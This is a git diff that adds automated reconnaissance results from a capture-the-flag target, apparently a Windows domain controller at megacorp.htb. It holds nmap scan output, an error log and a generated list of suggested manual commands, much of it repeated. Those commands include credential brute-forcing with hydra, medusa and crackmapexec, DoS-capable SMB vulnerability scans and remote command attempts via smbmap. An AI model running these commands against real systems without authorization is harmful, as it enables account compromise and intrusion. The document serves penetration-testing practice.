"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml" 10.129.243.131 + +ffuf -u 
http://megacorp.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.megacorp.htb" -fs 1034 -noninteractive -s | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_megacorp.htb_vhosts_subdomains-top1million-110000.txt" + +dig AXFR -p 53 @10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 megacorp.htb + +nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131 + +gobuster dns -d megacorp.htb -r 10.129.243.131 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt" + +nmap -vv --reason -Pn -T4 -sU -sV -p 88 --script="banner,krb5-enum-users" --script-args krb5-enum-users.realm="megacorp.htb",userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt" -oX 
"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_errors.log b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_errors.log new file mode 100644 index 00000000..604c1bc4 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_errors.log 
@@ -0,0 +1,56 @@
+[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9).
+[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131
+[-] Error Output:
+
+
+[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9).
+[-] Command: dig AXFR -p 53 @10.129.243.131
+[-] Error Output:
+
+
+[*] Service scan wkhtmltoimage (tcp/80/http/wkhtmltoimage) ran a command which returned a non-zero exit code (1).
+[-] Command: wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png
+[-] Error Output:
+QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
+Loading page (1/2)
+[> ] 0% [==============================> ] 50% [==============================> ] 50% Warning: Failed to load https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.2/themes/smoothness/jquery-ui.css (ignore)
+Error: Failed to load https://fonts.googleapis.com/css?family=Open+Sans%7CMaven+Pro:500, with network status code 3 and http status code 0 - Host fonts.googleapis.com not found
+Error: Failed to load https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js, with network status code 3 and http status code 0 - Host cdnjs.cloudflare.com not found
+libva info: VA-API version 1.17.0
+libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so
+libva info: Found init function __vaDriverInit_1_17
+libva error: /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so init failed
+libva info: va_openDriver() returns 1
+libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so
+libva info: Found init function __vaDriverInit_1_8
+libva info: va_openDriver() returns 0
+[============================================================] 100% Rendering (2/2)
+[> ] 0% [===============> ] 25% [============================================================] 100% Done
+Exit with code 1 due to network error: HostNotFoundError
+
+
+[*] Service scan SMBClient (tcp/139/netbios-ssn/smbclient) ran a command which returned a non-zero exit code (1).
+[-] Command: smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1
+[-] Error Output:
+
+
+[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9).
+[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131
+[-] Error Output:
+
+
+[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9).
+[-] Command: dig AXFR -p 53 @10.129.243.131
+[-] Error Output:
+
+
+[*] Service scan DnsRecon Default Scan (tcp/53/domain/dnsrecon) ran a command which returned a non-zero exit code (1).
+[-] Command: dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1
+[-] Error Output:
+
+
+[*] Service scan DnsRecon Default Scan (udp/53/domain/dnsrecon) ran a command which returned a non-zero exit code (1).
+[-] Command: dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1
+[-] Error Output:
+
+
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt
new file mode 100644
index 00000000..0ed1f7b8
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt
@@ -0,0 +1,77 @@
+# Nmap 7.93 scan initiated Sat Oct 28 14:23:46 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml 10.129.243.131
+Nmap scan report for megacorp.htb (10.129.243.131)
+Host is up, received user-set (0.041s latency).
+Scanned at 2023-10-28 14:23:47 CEST for 245s
+Not shown: 65517 filtered tcp ports (no-response)
+PORT STATE SERVICE REASON VERSION
+53/tcp open domain syn-ack ttl 127 Simple DNS Plus
+80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
+|_http-server-header: Microsoft-IIS/10.0
+|_http-title: Slandovia Energy
+| http-methods:
+| Supported Methods: OPTIONS TRACE GET HEAD POST
+|_ Potentially risky methods: TRACE
+88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:26:10Z)
+135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
+139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
+389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
+445/tcp open microsoft-ds? syn-ack ttl 127
+464/tcp open kpasswd5? syn-ack ttl 127
+593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
+636/tcp open tcpwrapped syn-ack ttl 127
+3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
+3269/tcp open tcpwrapped syn-ack ttl 127
+5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+|_http-title: Not Found
+|_http-server-header: Microsoft-HTTPAPI/2.0
+9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
+49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
+49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
+49695/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
+49843/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
+Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
+OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
+No OS matches for host
+TCP/IP fingerprint:
+SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653CFE48%P=x86_64-pc-linux-gnu)
+SEQ(SP=101%GCD=1%ISR=10D%TI=I%II=I%SS=S%TS=U)
+SEQ(SP=101%GCD=1%ISR=10D%TI=I%II=I%TS=U)
+OPS(O1=M550NW8NNS%O2=M550NW8NNS%O3=M550NW8%O4=M550NW8NNS%O5=M550NW8NNS%O6=M550NNS)
+WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
+ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M550NW8NNS%CC=Y%Q=)
+T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
+T2(R=N)
+T3(R=N)
+T4(R=N)
+U1(R=N)
+IE(R=Y%DFI=N%TG=80%CD=Z)
+
+Network Distance: 2 hops
+TCP Sequence Prediction: Difficulty=257 (Good luck!)
+IP ID Sequence Generation: Incremental
+Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+Host script results:
+|_clock-skew: 0s
+| p2p-conficker:
+| Checking for Conficker.C or higher...
+| Check 1 (port 25314/tcp): CLEAN (Timeout)
+| Check 2 (port 10793/tcp): CLEAN (Timeout)
+| Check 3 (port 25536/udp): CLEAN (Timeout)
+| Check 4 (port 25523/udp): CLEAN (Timeout)
+|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
+| smb2-time:
+| date: 2023-10-28T12:27:13
+|_ start_date: N/A
+| smb2-security-mode:
+| 311:
+|_ Message signing enabled and required
+
+TRACEROUTE (using port 135/tcp)
+HOP RTT ADDRESS
+1 35.29 ms 10.10.14.1
+2 35.21 ms megacorp.htb (10.129.243.131)
+
+Read data files from: /usr/bin/../share/nmap
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Oct 28 14:27:52 2023 -- 1 IP address (1 host up) scanned in 246.21 seconds
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_manual_commands.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_manual_commands.txt
new file mode 100644
index 00000000..58e88c23
--- /dev/null
+++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_manual_commands.txt
@@ -0,0 +1,338 @@ +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" 
http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). 
Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). 
Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d '' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d '' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] msrpc on tcp/49667 + + [-] RPC Client: + + rpcclient -p 49667 -U "" 10.129.243.131 + +[*] msrpc on tcp/49673 + + [-] RPC Client: + + rpcclient -p 49673 -U "" 10.129.243.131 + +[*] msrpc on tcp/49695 + + [-] RPC Client: + + rpcclient -p 49695 -U "" 10.129.243.131 + +[*] msrpc on tcp/49843 + + [-] RPC Client: + + rpcclient -p 49843 -U "" 10.129.243.131 + +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. 
+ + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" 
+ + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB 
vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d '' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d '' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] domain on udp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default_manual.txt + +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. 
+ + dnsrecon -n 10.129.243.131 -d megacorp.htb -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U 
"/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). 
Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). 
